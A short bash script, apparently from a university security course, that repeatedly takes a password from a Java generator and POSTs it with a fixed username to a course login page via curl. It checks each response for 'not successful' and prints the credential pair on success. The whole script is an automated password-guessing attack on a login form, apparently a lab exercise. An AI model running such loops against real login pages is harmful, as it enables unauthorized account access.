#!/bin/bash
# jonathan78_-0MO
# psw: dh
counter=0
while [ $counter -eq 0 ]
do
#The java onlinePsdFile is executed to get the random password	
password=$(java onlinePwdFile 2>&1)

#The curl command is used to send a POST request, sending the user 
#and password generated by the java program
response=$(curl --data "un=jonathan78_-0MO&pw=$password" http://cs5339.cs.utep.edu/longpre/loginScreen.php 2>&1)
	#The program verify if the response returned by the page contains the pattern: "not successful".
	#If the response is "not successful, this means that the user and password are wrong."
	#In the other case, if the response is not "not successful", this means that the user and password
	#are correct.
	if `echo ${response} | grep "not successful" 1>/dev/null 2>&1`
	then
	  #echo "True"
	  counter=0
	else
	  counter=1
	  echo "jonathan78_-0MO - $password"
	fi
	#The program waits one second
	sleep 1
done